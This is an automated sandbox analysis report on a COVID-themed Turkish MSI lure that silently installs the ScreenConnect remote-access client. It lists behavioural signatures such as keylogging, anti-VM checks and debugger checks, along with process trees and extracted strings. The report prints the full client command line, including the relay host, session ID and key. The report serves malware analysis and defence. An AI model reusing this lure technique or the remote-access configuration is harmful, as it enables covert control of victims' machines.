Loading ...

Play interactive tourEdit tour

Analysis Report Covid 19 bilgi y#U00f6netim sistemi.msi

Overview

General Information

Sample Name:Covid 19 bilgi y#U00f6netim sistemi.msi
Analysis ID:355327
MD5:1f365aa75ff0d2806a2269d238208593
SHA1:440ef2dfdd778ec159cd6babc60e2b70252d661f
SHA256:3dbe3682f5d3db8cd0d8c0586d3c345a458f274355a4dac2edd05f25092423a8

Most interesting Screenshot:

Detection

ScreenConnect Tool
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

.NET source code references suspicious native API functions
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Startup

  • System is w10x64
  • msiexec.exe (PID: 5888 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • rundll32.exe (PID: 6016 cmdline: rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • msiexec.exe (PID: 4812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 5456 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • ScreenConnect.ClientService.exe (PID: 5304 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c=' MD5: F4AFEF1043565F8967F5E8F57B3EEE13)
    • ScreenConnect.WindowsClient.exe (PID: 4316 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User' MD5: 72D9361CA129593F1F953D42EBD77122)
    • ScreenConnect.WindowsClient.exe (PID: 5072 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System' MD5: 72D9361CA129593F1F953D42EBD77122)
  • svchost.exe (PID: 5560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5600 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4760 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5840 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1968 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3440 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4084 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1332 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5604 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 3484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.471825192.0000000004112000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000000.00000003.203704441.00000269DBA8D000.00000004.00000001.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000006.00000000.204518995.0000000000CF2000.00000002.00020000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.ScreenConnect.WindowsClient.exe.5b0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              7.0.ScreenConnect.WindowsClient.exe.5b0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                5.2.ScreenConnect.ClientService.exe.4110000.10.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      Compliance:

                      barindex
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: c:
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                      Source: unknownDNS traffic detected: queries for: instance-s6p2r4-relay.screenconnect.com
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243037142.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: svchost.exe, 0000000A.00000002.469151661.000001F8C5C10000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: svchost.exe, 0000000A.00000002.468910314.000001F8C5B80000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: ScreenConnect.ClientService.exe, 00000005.00000002.462086274.00000000013A1000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.464165504.0000000002987000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/news/
                      Source: Microsoft.Deployment.WindowsInstaller.dll.2.drString found in binary or memory: http://wixtoolset.org/releases/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242447973.000000001C6B1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comFBV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242489209.000000001C6B1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comcomj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comi
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242591511.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.nV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242370795.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.zV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245560674.000000001C6AE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245758311.000000001C69B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.249982266.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerse
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.250137731.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFcnV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.246998651.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comFzV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.245818296.000000001C6AA000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.241463050.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/YV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.244105547.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTCSV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/FSV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/FTV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/HLj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.244222479.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/j
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.243744565.000000001C6A9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/F
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243966734.000000001C6B0000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/XTj
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.243826067.000000001C6B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/j
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000003.239355160.000000001C6B4000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.239416728.000000001C6B4000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comrBV
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.246683742.000000001C69A000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.474941757.000000001D922000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: ScreenConnect.WindowsClient.exe, 00000006.00000003.242306163.000000001C6AF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnwdthK
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com.
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000002.459723080.000001FDEAC3E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000F.00000002.308918837.0000022453A42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308456661.0000022453A5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000F.00000003.308413955.0000022453A61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                      Source: svchost.exe, 0000000F.00000002.308888069.0000022453A3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000F.00000002.308821917.0000022453A13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.308494934.0000022453A40000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000F.00000003.286707070.0000022453A32000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000F.00000002.308950171.0000022453A4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to log keystrokes (.Net Source)Show sources
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{460549FD-A8A1-4DCF-B47F-E1FFE52A8670}.SchedServiceConfig.rmiJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_3_04B504402_3_04B50440
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D5_2_00E3239D
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E378B45_2_00E378B4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3B07C5_2_00E3B07C
